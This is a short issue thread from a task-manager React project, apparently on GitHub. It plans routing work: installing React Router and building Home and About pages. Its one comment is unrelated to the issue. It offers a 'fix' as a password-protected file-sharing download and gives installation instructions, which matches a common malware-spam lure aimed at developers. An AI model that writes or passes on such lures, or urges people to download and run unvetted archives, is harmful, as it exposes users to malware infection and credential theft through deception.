### ISSUE TITLE
Routing Setup (Group Task) - **[3H]**

### ISSUE THREAD

**Issue by ahzamir** [ahzamir/task-manager#4]
8. **Set Up React Router** - **[1H]**

   - **Description:** Install and configure React Router in the project. Set up basic routes for different pages in `App.js`.

9. **Create Home Page** - **[1.5H]**

   - **Description:** Implement the Home page, which will include the task input, task list, and task filters components.

10. **Create About Page** - **[0.5H]**
    - **Description:** Implement a simple About page with basic information about the project.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
